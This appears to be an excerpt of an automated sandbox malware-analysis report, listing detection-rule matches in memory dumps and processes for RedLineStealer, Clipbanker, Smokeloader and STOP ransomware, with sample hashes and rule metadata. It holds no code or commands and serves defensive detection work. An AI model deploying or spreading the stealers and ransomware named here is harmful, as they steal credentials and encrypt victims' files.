Source: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.485749364.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000019.00000002.466055067.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001A.00000002.475638088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000018.00000002.618498812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000002.477291278.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001B.00000002.473184693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000015.00000002.461592637.0000000002290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000000.481088254.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.475372910.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000027.00000000.484270082.0000000001361000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001F.00000002.480287492.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.499761929.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001D.00000002.475621372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000014.00000002.460148088.00000000026A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.379724310.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.484895697.0000000000021000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000015.00000002.462688817.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000002.476748443.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001F.00000002.485496524.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7636, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7656, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7744, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6C74.exe PID: 7764, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6C74.exe PID: 7824, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7864, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7972, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 759F.exe PID: 7992, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: AF5C.exe PID: 8152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6C74.exe PID: 8172, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 9B15.exe PID: 5172, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: AF5C.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 6C74.exe PID: 3676, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 86ED.exe PID: 2300, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 9B15.exe PID: 3312, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 86ED.exe PID: 1476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E8B1.exe PID: 7184, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
